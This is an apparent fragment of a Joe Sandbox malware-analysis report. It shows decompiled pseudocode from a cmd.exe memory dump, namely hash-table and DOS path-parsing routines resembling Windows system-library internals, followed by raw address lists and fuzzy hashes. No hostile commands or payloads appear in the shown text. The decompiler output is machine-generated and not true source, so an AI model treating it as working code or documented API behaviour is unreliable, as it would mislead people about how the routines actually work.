																_v16 =  *((intOrPtr*)(_t178 + 0x28));
																_v32 =  *(_t178 + 0x20);
																_t181 = _t274 >> 5;
																_v24 =  *((intOrPtr*)(_t178 + 0x24));
																if( *_t368 < (_t274 >> 5) + (_t274 >> 5)) {
																	L76:
																	_t383 = _v36;
																	_t153 = (_t274 >> 5) - 1; // 0xffffffdf
																	_t367 = _t153 & (((_t274 & 0x0000001f | 0xffffffff) << (_t274 & 0x0000001f) &  *(_t383 + 4)) >> 0x00000018) + ((((_t274 & 0x0000001f | 0xffffffff) << (_t274 & 0x0000001f) &  *(_t383 + 4)) >> 0x00000010 & 0x000000ff) + ((((_t274 & 0x0000001f | 0xffffffff) << (_t274 & 0x0000001f) &  *(_t383 + 4)) >> 0x00000008 & 0x000000ff) + (((_t274 & 0x0000001f | 0xffffffff) << (_t274 & 0x0000001f) &  *(_t383 + 4) & 0x000000ff) + 0x00b15dcb) * 0x00000025) * 0x00000025) * 0x00000025;
																	_t281 = _v20;
																	_t314 =  *((intOrPtr*)(_t281 + 8));
																	 *_t383 =  *(_t314 + _t367 * 4);
																	 *(_t314 + _t367 * 4) = _t383;
																	 *_t281 =  *_t281 + 1;
																	E036DFFB0(_t281, _t383, _v48);
																	goto L39;
																}
																_t315 = 2;
																if(E036FF3D5( &_v40, _t181 * _t315, _t181 * _t315 >> 0x20) < 0) {
																	goto L76;
																}
																_t392 = _v40;
																if(_t392 < 4) {
																	_t392 = 4;
																}
																 *0x37bb1e0(_t392 << 2, _v16);
																_t373 =  *_v32();
																_v12 = _t373;
																if(_t373 == 0) {
																	_t274 =  *(_v20 + 4);
																	if(_t274 >= 0x20) {
																		goto L76;
																	}
																	L78:
																	_t270 = _t383;
																	L79:
																	E036DFFB0(_t270, _t383, _v48);
																	_t367 = _v36;
																	E0379E5B6(_v44, _v36);
																	goto L81;
																} else {
																	_t107 = _t392 - 1; // 0x3
																	_t319 = _t107;
																	if((_t392 & _t319) == 0) {
																		L64:
																		if(_t392 > 0x4000000) {
																			_t392 = 0x4000000;
																		}
																		_t284 = _t373;
																		_t201 = _v20 | 0x00000001;
																		asm("sbb ecx, ecx");
																		_t323 =  !(_v12 + (_t392 << 2)) & _t392 << 0x00000002 >> 0x00000002;
																		if(_t323 <= 0) {
																			L69:
																			_t377 = _v20;
																			_v40 = (_t201 | 0xffffffff) << ( *(_t377 + 4) & 0x0000001f);
																			if(( *(_t377 + 4) & 0xffffffe0) <= 0) {
																				L74:
																				_t326 =  *((intOrPtr*)(_t377 + 8));
																				_t274 =  *(_t377 + 4) & 0x0000001f | _t392 << 0x00000005;
																				 *((intOrPtr*)(_t377 + 8)) = _v12;
																				 *(_t377 + 4) = _t274;
																				if(_t326 != 0) {
																					 *0x37bb1e0(_t326, _v16);
																					 *_v24();
																					_t274 =  *(_v20 + 4);
																				}
																				goto L76;
																			} else {
																				goto L70;
																			}
																			do {
																				L70:
																				_t378 =  *((intOrPtr*)(_t377 + 8));
																				_v28 = _t378;
																				while(1) {
																					_t328 =  *(_t378 + _t383 * 4);
																					_v32 = _t328;
																					if((_t328 & 0x00000001) != 0) {
																						goto L73;
																					}
																					 *(_t378 + _t383 * 4) =  *_t328;
																					_t381 = _v12;
																					_t132 = _t392 - 1; // -1
																					_t334 = _t132 & (( *(_t328 + 4) & _v40) >> 0x00000018) + ((( *(_t328 + 4) & _v40) >> 0x00000010 & 0x000000ff) + ((( *(_t328 + 4) & _v40) >> 0x00000008 & 0x000000ff) + (( *(_t328 + 4) & _v40 & 0x000000ff) + 0x00b15dcb) * 0x00000025) * 0x00000025) * 0x00000025;
																					_t292 = _v32;
																					 *_t292 =  *(_t381 + _t334 * 4);
																					 *(_t381 + _t334 * 4) = _t292;
																					_t378 = _v28;
																				}
																				L73:
																				_t377 = _v20;
																				_t383 = _t383 + 1;
																			} while (_t383 <  *(_t377 + 4) >> 5);
																			goto L74;
																		} else {
																			_t382 = _t383;
																			do {
																				_t382 = _t382 + 1;
																				 *_t284 = _t201;
																				_t284 =  &(_t284[1]);
																			} while (_t382 < _t323);
																			goto L69;
																		}
																	}
																	_t335 = _t319 | 0xffffffff;
																	if(_t392 == 0) {
																		L63:
																		_t392 = 1 << _t335;
																		goto L64;
																	} else {
																		goto L62;
																	}
																	do {
																		L62:
																		_t335 = _t335 + 1;
																		_t392 = _t392 >> 1;
																	} while (_t392 != 0);
																	goto L63;
																}
															}
															goto L49;
														}
													}
													_t273 = _t383;
													goto L48;
												}
												_t223 = _t177 >> 5;
												_v32 = _t223;
												if(_t223 == 0) {
													_t273 = _t383;
													L51:
													if(_t273 == 0) {
														goto L55;
													}
													_t88 = _t273 + 8; // 0x8
													if(E0379E7A8(_t88) != 0) {
														goto L79;
													}
													goto L78;
												}
												_t273 =  *((intOrPtr*)(_t368 + 8)) + (_v32 - 0x00000001 & (_v24 & 0x000000ff) + 0x164b2f3f + (((_t305 & 0x000000ff) * 0x00000025 + (_v16 & 0x000000ff)) * 0x00000025 + (_v28 & 0x000000ff)) * 0x00000025) * 4;
												_t305 = _v40;
												goto L44;
												L49:
											} while (E0379EE71(_t273,  &_v56) == 0);
											_t368 = _v20;
											goto L51;
										}
										L39:
										_t270 = _t383;
										goto L81;
									}
									_t50 = _t270 + 8; // 0x8
									_t345 = _t50;
									if(E0379E7A8(_t50) == 0) {
										_t270 = _t383;
									}
									E036EFA00(_t270, _t345, _t383, _v48);
									goto L81;
								}
								_t40 = _t367 + 8; // 0x0
								_t271 =  *_t40 + (_v36 - 0x00000001 & (_v16 & 0x000000ff) + 0x164b2f3f + (((_t300 & 0x000000ff) * 0x00000025 + (_v24 & 0x000000ff)) * 0x00000025 + (_v28 & 0x000000ff)) * 0x00000025) * 4;
								_t300 = _v32;
								L25:
								_t367 = _v12;
								while(1) {
									_t271 =  *_t271;
									if((_t271 & 0x00000001) != 0) {
										break;
									}
									if(_t300 == ( *(_t271 + 4) & _t367)) {
										L30:
										if(_t270 == 0) {
											goto L38;
										}
										if(E0379EE71(_t270,  &_v56) != 0) {
											goto L34;
										}
										_t367 = _v20;
										goto L22;
									}
								}
								_t270 = _t383;
								goto L30;
							}
						}
						_t386 = _t385 - 1;
						if(_t386 == 0) {
							L19:
							_t393 = _t393 * 0x25 + ( *_t367 & 0x000000ff);
							_t367 = _t367 + 1;
							goto L20;
						}
						_t387 = _t386 - 1;
						if(_t387 == 0) {
							L18:
							_t393 = _t393 * 0x25 + ( *_t367 & 0x000000ff);
							_t367 = _t367 + 1;
							goto L19;
						}
						_t388 = _t387 - 1;
						if(_t388 == 0) {
							L17:
							_t393 = _t393 * 0x25 + ( *_t367 & 0x000000ff);
							_t367 = _t367 + 1;
							goto L18;
						}
						_t389 = _t388 - 1;
						if(_t389 == 0) {
							L16:
							_t393 = _t393 * 0x25 + ( *_t367 & 0x000000ff);
							_t367 = _t367 + 1;
							goto L17;
						}
						_t390 = _t389 - 1;
						if(_t390 == 0) {
							L15:
							_t393 = _t393 * 0x25 + ( *_t367 & 0x000000ff);
							_t367 = _t367 + 1;
							goto L16;
						}
						if(_t390 != 1) {
							goto L21;
						}
						_t393 = _t393 * 0x25 + ( *_t367 & 0x000000ff);
						_t367 = _t367 + 1;
						goto L15;
					}
					_t258 = _t384 >> 3;
					_v36 = _t258;
					_t293 = _t258;
					_t384 = _t384 + _t258 * 0xfffffff8;
					do {
						_t365 = (((((( *(_t367 + 1) & 0x000000ff) * 0x25 + ( *(_t367 + 2) & 0x000000ff)) * 0x25 + ( *(_t367 + 3) & 0x000000ff)) * 0x25 + ( *(_t367 + 4) & 0x000000ff)) * 0x25 + ( *(_t367 + 5) & 0x000000ff)) * 0x25 + ( *(_t367 + 6) & 0x000000ff)) * 0x25 + ( *_t367 & 0x000000ff) * 0x1a617d0d;
						_t406 =  *(_t367 + 7) & 0x000000ff;
						_t367 = _t367 + 8;
						_t393 = _t406 + _t365 - _t393 * 0x2fe8ed1f;
						_t293 = _t293 - 1;
					} while (_t293 != 0);
					_t269 = _v44;
					goto L7;
				}
			}

0x0379dfce
0x0379dfdd
0x0379dfe1
0x0379dfe3
0x0379dfea
0x0379e49c
0x0379e49c
0x0379e49e
0x0379e4b0
0x0379e4b0
0x0379dff0
0x0379dff5
0x00000000
0x0379e003
0x0379e003
0x0379e006
0x0379e00b
0x0379e00e
0x0379e014
0x0379e07d
0x0379e07d
0x0379e080
0x0379e0d6
0x0379e0dc
0x0379e0de
0x0379e0de
0x0379e0e2
0x0379e0e5
0x0379e0ea
0x0379e0ea
0x0379e0ed
0x0379e0ef
0x0379e0f2
0x0379e0f4
0x0379e0f4
0x0379e0f4
0x0379e0f4
0x0379e0f9
0x0379e100
0x0379e105
0x0379e108
0x0379e10b
0x0379e10f
0x0379e112
0x0379e116
0x0379e119
0x0379e11d
0x0379e122
0x00000000
0x00000000
0x0379e124
0x0379e127
0x0379e12c
0x0379e197
0x0379e199
0x0379e19b
0x0379e1b8
0x0379e1b8
0x0379e1bc
0x0379e1c4
0x0379e1c8
0x0379e1cd
0x0379e1d2
0x0379e1dc
0x0379e1e1
0x0379e1e3
0x0379e1e3
0x0379e1e6
0x0379e1ea
0x0379e1f2
0x0379e1f8
0x0379e1fa
0x0379e1fd
0x0379e201
0x0379e204
0x0379e208
0x0379e20b
0x0379e20f
0x0379e214
0x0379e258
0x0379e258
0x0379e258
0x0379e25d
0x00000000
0x00000000
0x0379e267
0x0379e26d
0x0379e26f
0x0379e2a3
0x0379e2a3
0x0379e2a6
0x0379e2ac
0x0379e2b5
0x0379e2ba
0x0379e2bd
0x0379e2c5
0x0379e418
0x0379e418
0x0379e451
0x0379e45e
0x0379e460
0x0379e463
0x0379e469
0x0379e46b
0x0379e46e
0x0379e470
0x00000000
0x0379e470
0x0379e2cd
0x0379e2dc
0x00000000
0x00000000
0x0379e2e2
0x0379e2e8
0x0379e2ec
0x0379e2ec
0x0379e2fb
0x0379e303
0x0379e305
0x0379e30a
0x0379e47d
0x0379e483
0x00000000
0x00000000
0x0379e485
0x0379e485
0x0379e487
0x0379e48a
0x0379e48f
0x0379e495
0x00000000
0x0379e310
0x0379e310
0x0379e310
0x0379e315
0x0379e328
0x0379e32f
0x0379e331
0x0379e331
0x0379e336
0x0379e340
0x0379e34b
0x0379e34f
0x0379e351
0x0379e35f
0x0379e35f
0x0379e374
0x0379e377
0x0379e3e6
0x0379e3e9
0x0379e3f5
0x0379e3f7
0x0379e3fa
0x0379e3ff
0x0379e40a
0x0379e410
0x0379e415
0x0379e415
0x00000000
0x00000000
0x00000000
0x00000000
0x0379e379
0x0379e379
0x0379e379
0x0379e37c
0x0379e37f
0x0379e37f
0x0379e382
0x0379e388
0x00000000
0x00000000
0x0379e38c
0x0379e3b6
0x0379e3c1
0x0379e3c6
0x0379e3c8
0x0379e3ce
0x0379e3d0
0x0379e3d3
0x0379e3d3
0x0379e3d8
0x0379e3d8
0x0379e3db
0x0379e3e2
0x00000000
0x0379e353
0x0379e353
0x0379e355
0x0379e355
0x0379e356
0x0379e358
0x0379e35b
0x00000000
0x0379e355
0x0379e351
0x0379e317
0x0379e31c
0x0379e323
0x0379e326
0x00000000
0x00000000
0x00000000
0x00000000
0x0379e31e
0x0379e31e
0x0379e31e
0x0379e31f
0x0379e31f
0x00000000
0x0379e31e
0x0379e30a
0x00000000
0x0379e26f
0x0379e269
0x0379e26b
0x00000000
0x0379e26b
0x0379e216
0x0379e219
0x0379e21e
0x0379e29f
0x0379e286
0x0379e288
0x00000000
0x00000000
0x0379e28a
0x0379e294
0x00000000
0x00000000
0x00000000
0x0379e29a
0x0379e252
0x0379e255
0x00000000
0x0379e271
0x0379e27b
0x0379e283
0x00000000
0x0379e283
0x0379e1d4
0x0379e1d4
0x00000000
0x0379e1d4
0x0379e19d
0x0379e19d
0x0379e1a7
0x0379e1a9
0x0379e1a9
0x0379e1ae
0x00000000
0x0379e1ae
0x0379e15d
0x0379e160
0x0379e163
0x0379e166
0x0379e166
0x0379e169
0x0379e169
0x0379e16e
0x00000000
0x00000000
0x0379e177
0x0379e17d
0x0379e17f
0x00000000
0x00000000
0x0379e18d
0x00000000
0x00000000
0x0379e18f
0x00000000
0x0379e18f
0x0379e179
0x0379e17b
0x00000000
0x0379e17b
0x0379e0f4
0x0379e082
0x0379e085
0x0379e0cd
0x0379e0d3
0x0379e0d5
0x00000000
0x0379e0d5
0x0379e087
0x0379e08a
0x0379e0c4
0x0379e0ca
0x0379e0cc
0x00000000
0x0379e0cc
0x0379e08c
0x0379e08f
0x0379e0bb
0x0379e0c1
0x0379e0c3
0x00000000
0x0379e0c3
0x0379e091
0x0379e094
0x0379e0b2
0x0379e0b8
0x0379e0ba
0x00000000
0x0379e0ba
0x0379e096
0x0379e099
0x0379e0a9
0x0379e0af
0x0379e0b1
0x00000000
0x0379e0b1
0x0379e09e
0x00000000
0x00000000
0x0379e0a6
0x0379e0a8
0x00000000
0x0379e0a8
0x0379e018
0x0379e01b
0x0379e01e
0x0379e023
0x0379e025
0x0379e062
0x0379e06a
0x0379e06e
0x0379e073
0x0379e075
0x0379e075
0x0379e07a
0x00000000
0x0379e07a

Memory Dump Source

Source File: 00000005.00000002.480396145.00000000036A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 036A0000, based on PE: true

Associated: 00000005.00000002.482855504.00000000037BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.483011341.00000000037BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_36a0000_cmd.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 03b1e27618286193e2389322d11a1211afeaf2a816c65eecdcbb328b4076757e
Instruction ID: c64ac0887d1ca356eb4a0b4c4462bfe92104d321b9f27665279b1963faff6f4b
Opcode Fuzzy Hash: 03b1e27618286193e2389322d11a1211afeaf2a816c65eecdcbb328b4076757e
Instruction Fuzzy Hash: DFF1C372E0021A9BDF18CEA9D9D05BDFBF5EB48200B19836ED856EF781D634D940CB90

Uniqueness

Uniqueness Score: -1.00%

Function 036E4120 Relevance: .4, Instructions: 444
COMMONCrypto

Download Yara Rule

C-Code - Quality: 92%

			E036E4120(signed char __ecx, signed short* __edx, signed short* _a4, signed int _a8, signed short* _a12, signed short* _a16, signed short _a20) {
				signed int _v8;
				void* _v20;
				signed int _v24;
				char _v532;
				char _v540;
				signed short _v544;
				signed int _v548;
				signed short* _v552;
				signed short _v556;
				signed short* _v560;
				signed short* _v564;
				signed short* _v568;
				void* _v570;
				signed short* _v572;
				signed short _v576;
				signed int _v580;
				char _v581;
				void* _v584;
				unsigned int _v588;
				signed short* _v592;
				void* _v597;
				void* _v600;
				void* _v604;
				void* _v609;
				void* _v616;
				void* __ebx;
				void* __edi;
				void* __esi;
				unsigned int _t161;
				signed int _t162;
				unsigned int _t163;
				void* _t169;
				signed short _t173;
				signed short _t177;
				signed short _t181;
				unsigned int _t182;
				signed int _t185;
				signed int _t213;
				signed int _t225;
				short _t233;
				signed char _t234;
				signed int _t242;
				signed int _t243;
				signed int _t244;
				signed int _t245;
				signed int _t250;
				void* _t251;
				signed short* _t254;
				void* _t255;
				signed int _t256;
				void* _t257;
				signed short* _t260;
				signed short _t265;
				signed short* _t269;
				signed short _t271;
				signed short** _t272;
				signed short* _t275;
				signed short _t282;
				signed short _t283;
				signed short _t290;
				signed short _t299;
				signed short _t307;
				signed int _t308;
				signed short _t311;
				signed short* _t315;
				signed short _t316;
				void* _t317;
				void* _t319;
				signed short* _t321;
				void* _t322;
				void* _t323;
				unsigned int _t324;
				signed int _t325;
				void* _t326;
				signed int _t327;
				signed int _t329;

				_t329 = (_t327 & 0xfffffff8) - 0x24c;
				_v8 =  *0x37bd360 ^ _t329;
				_t157 = _a8;
				_t321 = _a4;
				_t315 = __edx;
				_v548 = __ecx;
				_t305 = _a20;
				_v560 = _a12;
				_t260 = _a16;
				_v564 = __edx;
				_v580 = _a8;
				_v572 = _t260;
				_v544 = _a20;
				if( *__edx <= 8) {
					L3:
					if(_t260 != 0) {
						 *_t260 = 0;
					}
					_t254 =  &_v532;
					_v588 = 0x208;
					if((_v548 & 0x00000001) != 0) {
						_v556 =  *_t315;
						_v552 = _t315[2];
						_t161 = E036FF232( &_v556);
						_t316 = _v556;
						_v540 = _t161;
						goto L17;
					} else {
						_t306 = 0x208;
						_t298 = _t315;
						_t316 = E036E6E30(_t315, 0x208, _t254, _t260,  &_v581,  &_v540);
						if(_t316 == 0) {
							L68:
							_t322 = 0xc0000033;
							goto L39;
						} else {
							while(_v581 == 0) {
								_t233 = _v588;
								if(_t316 > _t233) {
									_t234 = _v548;
									if((_t234 & 0x00000004) != 0 || (_t234 & 0x00000008) == 0 &&  *((char*)( *[fs:0x30] + 3)) < 0) {
										_t254 = L036E4620(_t298,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t316);
										if(_t254 == 0) {
											_t169 = 0xc0000017;
										} else {
											_t298 = _v564;
											_v588 = _t316;
											_t306 = _t316;
											_t316 = E036E6E30(_v564, _t316, _t254, _v572,  &_v581,  &_v540);
											if(_t316 != 0) {
												continue;
											} else {
												goto L68;
											}
										}
									} else {
										goto L90;
									}
								} else {
									_v556 = _t316;
									 *((short*)(_t329 + 0x32)) = _t233;
									_v552 = _t254;
									if(_t316 < 2) {
										L11:
										if(_t316 < 4 ||  *_t254 == 0 || _t254[1] != 0x3a) {
											_t161 = 5;
										} else {
											if(_t316 < 6) {
												L87:
												_t161 = 3;
											} else {
												_t242 = _t254[2] & 0x0000ffff;
												if(_t242 != 0x5c) {
													if(_t242 == 0x2f) {
														goto L16;
													} else {
														goto L87;
													}
													goto L101;
												} else {
													L16:
													_t161 = 2;
												}
											}
										}
									} else {
										_t243 =  *_t254 & 0x0000ffff;
										if(_t243 == 0x5c || _t243 == 0x2f) {
											if(_t316 < 4) {
												L81:
												_t161 = 4;
												goto L17;
											} else {
												_t244 = _t254[1] & 0x0000ffff;
												if(_t244 != 0x5c) {
													if(_t244 == 0x2f) {
														goto L60;
													} else {
														goto L81;
													}
												} else {
													L60:
													if(_t316 < 6) {
														L83:
														_t161 = 1;
														goto L17;
													} else {
														_t245 = _t254[2] & 0x0000ffff;
														if(_t245 != 0x2e) {
															if(_t245 == 0x3f) {
																goto L62;
															} else {
																goto L83;
															}
														} else {
															L62:
															if(_t316 < 8) {
																L85:
																_t161 = ((0 | _t316 != 0x00000006) - 0x00000001 & 0x00000006) + 1;
																goto L17;
															} else {
																_t250 = _t254[3] & 0x0000ffff;
																if(_t250 != 0x5c) {
																	if(_t250 == 0x2f) {
																		goto L64;
																	} else {
																		goto L85;
																	}
																} else {
																	L64:
																	_t161 = 6;
																	goto L17;
																}
															}
														}
													}
												}
											}
											goto L101;
										} else {
											goto L11;
										}
									}
									L17:
									if(_t161 != 2) {
										_t162 = _t161 - 1;
										if(_t162 > 5) {
											goto L18;
										} else {
											switch( *((intOrPtr*)(_t162 * 4 +  &M036E45F8))) {
												case 0:
													_v568 = 0x36a1078;
													__eax = 2;
													goto L20;
												case 1:
													goto L18;
												case 2:
													_t163 = 4;
													goto L19;
											}
										}
										goto L41;
									} else {
										L18:
										_t163 = 0;
										L19:
										_v568 = 0x36a11c4;
									}
									L20:
									_v588 = _t163;
									_v564 = _t163 + _t163;
									_t306 =  *_v568 & 0x0000ffff;
									_t265 = _t306 - _v564 + 2 + (_t316 & 0x0000ffff);
									_v576 = _t265;
									if(_t265 > 0xfffe) {
										L90:
										_t322 = 0xc0000106;
									} else {
										if(_t321 != 0) {
											if(_t265 > (_t321[1] & 0x0000ffff)) {
												if(_v580 != 0) {
													goto L23;
												} else {
													_t322 = 0xc0000106;
													goto L39;
												}
											} else {
												_t177 = _t306;
												goto L25;
											}
											goto L101;
										} else {
											if(_v580 == _t321) {
												_t322 = 0xc000000d;
											} else {
												L23:
												_t173 = L036E4620(_t265,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t265);
												_t269 = _v592;
												_t269[2] = _t173;
												if(_t173 == 0) {
													_t322 = 0xc0000017;
												} else {
													_t316 = _v556;
													 *_t269 = 0;
													_t321 = _t269;
													_t269[1] = _v576;
													_t177 =  *_v568 & 0x0000ffff;
													L25:
													_v580 = _t177;
													if(_t177 == 0) {
														L29:
														_t307 =  *_t321 & 0x0000ffff;
													} else {
														_t290 =  *_t321 & 0x0000ffff;
														_v576 = _t290;
														_t310 = _t177 & 0x0000ffff;
														if((_t290 & 0x0000ffff) + (_t177 & 0x0000ffff) > (_t321[1] & 0x0000ffff)) {
															_t307 =  *_t321 & 0xffff;
														} else {
															_v576 = _t321[2] + ((_v576 & 0x0000ffff) >> 1) * 2;
															E0370F720(_t321[2] + ((_v576 & 0x0000ffff) >> 1) * 2, _v568[2], _t310);
															_t329 = _t329 + 0xc;
															_t311 = _v580;
															_t225 =  *_t321 + _t311 & 0x0000ffff;
															 *_t321 = _t225;
															if(_t225 + 1 < (_t321[1] & 0x0000ffff)) {
																 *((short*)(_v576 + ((_t311 & 0x0000ffff) >> 1) * 2)) = 0;
															}
															goto L29;
														}
													}
													_t271 = _v556 - _v588 + _v588;
													_v580 = _t307;
													_v576 = _t271;
													if(_t271 != 0) {
														_t308 = _t271 & 0x0000ffff;
														_v588 = _t308;
														if(_t308 + (_t307 & 0x0000ffff) <= (_t321[1] & 0x0000ffff)) {
															_v580 = _t321[2] + ((_v580 & 0x0000ffff) >> 1) * 2;
															E0370F720(_t321[2] + ((_v580 & 0x0000ffff) >> 1) * 2, _v552 + _v564, _t308);
															_t329 = _t329 + 0xc;
															_t213 =  *_t321 + _v576 & 0x0000ffff;
															 *_t321 = _t213;
															if(_t213 + 1 < (_t321[1] & 0x0000ffff)) {
																 *((short*)(_v580 + (_v588 >> 1) * 2)) = 0;
															}
														}
													}
													_t272 = _v560;
													if(_t272 != 0) {
														 *_t272 = _t321;
													}
													_t306 = 0;
													 *((short*)(_t321[2] + (( *_t321 & 0x0000ffff) >> 1) * 2)) = 0;
													_t275 = _v572;
													if(_t275 != 0) {
														_t306 =  *_t275;
														if(_t306 != 0) {
															 *_t275 = ( *_v568 & 0x0000ffff) - _v564 - _t254 + _t306 + _t321[2];
														}
													}
													_t181 = _v544;
													if(_t181 != 0) {
														 *_t181 = 0;
														 *((intOrPtr*)(_t181 + 4)) = 0;
														 *((intOrPtr*)(_t181 + 8)) = 0;
														 *((intOrPtr*)(_t181 + 0xc)) = 0;
														if(_v540 == 5) {
															_t182 = E036C52A5(1);
															_v588 = _t182;
															if(_t182 == 0) {
																E036DEB70(1, 0x37b79a0);
																goto L38;
															} else {
																_v560 = _t182 + 0xc;
																_t185 = E036DAA20( &_v556, _t182 + 0xc,  &_v556, 1);
																if(_t185 == 0) {
																	_t324 = _v588;
																	goto L97;
																} else {
																	_t306 = _v544;
																	_t282 = ( *_v560 & 0x0000ffff) - _v564 + ( *_v568 & 0x0000ffff) + _t321[2];
																	 *(_t306 + 4) = _t282;
																	_v576 = _t282;
																	_t325 = _t316 -  *_v560 & 0x0000ffff;
																	 *_t306 = _t325;
																	if( *_t282 == 0x5c) {
																		_t149 = _t325 - 2; // -2
																		_t283 = _t149;
																		 *_t306 = _t283;
																		 *(_t306 + 4) = _v576 + 2;
																		_t185 = _t283 & 0x0000ffff;
																	}
																	_t324 = _v588;
																	 *(_t306 + 2) = _t185;
																	if((_v548 & 0x00000002) == 0) {
																		L97:
																		asm("lock xadd [esi], eax");
																		if((_t185 | 0xffffffff) == 0) {
																			_push( *((intOrPtr*)(_t324 + 4)));
																			E037095D0();
																			L036E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t324);
																		}
																	} else {
																		 *(_t306 + 0xc) = _t324;
																		 *((intOrPtr*)(_t306 + 8)) =  *((intOrPtr*)(_t324 + 4));
																	}
																	goto L38;
																}
															}
															goto L41;
														}
													}
													L38:
													_t322 = 0;
												}
											}
										}
									}
									L39:
									if(_t254 !=  &_v532) {
										L036E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t254);
									}
									_t169 = _t322;
								}
								goto L41;
							}
							goto L68;
						}
					}
					L41:
					_pop(_t317);
					_pop(_t323);
					_pop(_t255);
					return E0370B640(_t169, _t255, _v8 ^ _t329, _t306, _t317, _t323);
				} else {
					_t299 = __edx[2];
					if( *_t299 == 0x5c) {
						_t256 =  *(_t299 + 2) & 0x0000ffff;
						if(_t256 != 0x5c) {
							if(_t256 != 0x3f) {
								goto L2;
							} else {
								goto L50;
							}
						} else {
							L50:
							if( *((short*)(_t299 + 4)) != 0x3f ||  *((short*)(_t299 + 6)) != 0x5c) {
								goto L2;
							} else {
								_t251 = E03703D43(_t315, _t321, _t157, _v560, _v572, _t305);
								_pop(_t319);
								_pop(_t326);
								_pop(_t257);
								return E0370B640(_t251, _t257, _v24 ^ _t329, _t321, _t319, _t326);
							}
						}
					} else {
						L2:
						_t260 = _v572;
						goto L3;
					}
				}
				L101:
			}

0x036e4128
0x036e4135
0x036e413c
0x036e4141
0x036e4145
0x036e4147
0x036e414e
0x036e4151
0x036e4159
0x036e415c
0x036e4160
0x036e4164
0x036e4168
0x036e416c
0x036e417f
0x036e4181
0x036e446a
0x036e446a
0x036e418c
0x036e4195
0x036e4199
0x036e4432
0x036e4439
0x036e443d
0x036e4442
0x036e4447
0x00000000
0x036e419f
0x036e41a3
0x036e41b1
0x036e41b9
0x036e41bd
0x036e45db
0x036e45db
0x00000000
0x036e41c3
0x036e41c3
0x036e41ce
0x036e41d4
0x0372e138
0x0372e13e
0x0372e169
0x0372e16d
0x0372e19e
0x0372e16f
0x0372e16f
0x0372e175
0x0372e179
0x0372e18f
0x0372e193
0x00000000
0x0372e199
0x00000000
0x0372e199
0x0372e193
0x00000000
0x00000000
0x00000000
0x036e41da
0x036e41da
0x036e41df
0x036e41e4
0x036e41ec
0x036e4203
0x036e4207
0x0372e1fd
0x036e4222
0x036e4226
0x0372e1f3
0x0372e1f3
0x036e422c
0x036e422c
0x036e4233
0x0372e1ed
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x036e4239
0x036e4239
0x036e4239
0x036e4239
0x036e4233
0x036e4226
0x036e41ee
0x036e41ee
0x036e41f4
0x036e4575
0x0372e1b1
0x0372e1b1
0x00000000
0x036e457b
0x036e457b
0x036e4582
0x0372e1ab
0x00000000
0x00000000
0x00000000
0x00000000
0x036e4588
0x036e4588
0x036e458c
0x0372e1c4
0x0372e1c4
0x00000000
0x036e4592
0x036e4592
0x036e4599
0x0372e1be
0x00000000
0x00000000
0x00000000
0x00000000
0x036e459f
0x036e459f
0x036e45a3
0x0372e1d7
0x0372e1e4
0x00000000
0x036e45a9
0x036e45a9
0x036e45b0
0x0372e1d1
0x00000000
0x00000000
0x00000000
0x00000000
0x036e45b6
0x036e45b6
0x036e45b6
0x00000000
0x036e45b6
0x036e45b0
0x036e45a3
0x036e4599
0x036e458c
0x036e4582
0x00000000
0x00000000
0x00000000
0x00000000
0x036e41f4
0x036e423e
0x036e4241
0x036e45c0
0x036e45c4
0x00000000
0x036e45ca
0x036e45ca
0x00000000
0x0372e207
0x0372e20f
0x00000000
0x00000000
0x00000000
0x00000000
0x036e45d1
0x00000000
0x00000000
0x036e45ca
0x00000000
0x036e4247
0x036e4247
0x036e4247
0x036e4249
0x036e4249
0x036e4249
0x036e4251
0x036e4251
0x036e4257
0x036e425f
0x036e426e
0x036e4270
0x036e427a
0x0372e219
0x0372e219
0x036e4280
0x036e4282
0x036e4456
0x036e45ea
0x00000000
0x036e45f0
0x0372e223
0x00000000
0x0372e223
0x036e445c
0x036e445c
0x00000000
0x036e445c
0x00000000
0x036e4288
0x036e428c
0x0372e298
0x036e4292
0x036e4292
0x036e429e
0x036e42a3
0x036e42a7
0x036e42ac
0x0372e22d
0x036e42b2
0x036e42b2
0x036e42b9
0x036e42bc
0x036e42c2
0x036e42ca
0x036e42cd
0x036e42cd
0x036e42d4
0x036e433f
0x036e433f
0x036e42d6
0x036e42d6
0x036e42d9
0x036e42dd
0x036e42eb
0x0372e23a
0x036e42f1
0x036e4305
0x036e430d
0x036e4315
0x036e4318
0x036e431f
0x036e4322
0x036e432e
0x036e433b
0x036e433b
0x00000000
0x036e432e
0x036e42eb
0x036e434c
0x036e434e
0x036e4352
0x036e4359
0x036e435e
0x036e4361
0x036e436e
0x036e438a
0x036e438e
0x036e4396
0x036e439e
0x036e43a1
0x036e43ad
0x036e43bb
0x036e43bb
0x036e43ad
0x036e436e
0x036e43bf
0x036e43c5
0x036e4463
0x036e4463
0x036e43ce
0x036e43d5
0x036e43d9
0x036e43df
0x036e4475
0x036e4479
0x036e4491
0x036e4491
0x036e4479
0x036e43e5
0x036e43eb
0x036e43f4
0x036e43f6
0x036e43f9
0x036e43fc
0x036e43ff
0x036e44e8
0x036e44ed
0x036e44f3
0x0372e247
0x00000000
0x036e44f9
0x036e4504
0x036e4508
0x036e450f
0x0372e269
0x00000000
0x036e4515
0x036e4519
0x036e4531
0x036e4534
0x036e4537
0x036e453e
0x036e4541
0x036e454a
0x0372e255
0x0372e255
0x0372e25b
0x0372e25e
0x0372e261
0x0372e261
0x036e4555
0x036e4559
0x036e455d
0x0372e26d
0x0372e270
0x0372e274
0x0372e27a
0x0372e27d
0x0372e28e
0x0372e28e
0x036e4563
0x036e4563
0x036e4569
0x036e4569
0x00000000
0x036e455d
0x036e450f
0x00000000
0x036e44f3
0x036e43ff
0x036e4405
0x036e4405
0x036e4405
0x036e42ac
0x036e428c
0x036e4282
0x036e4407
0x036e440d
0x0372e2af
0x0372e2af
0x036e4413
0x036e4413
0x00000000
0x036e41d4
0x00000000
0x036e41c3
0x036e41bd
0x036e4415
0x036e4415
0x036e4416
0x036e4417
0x036e4429
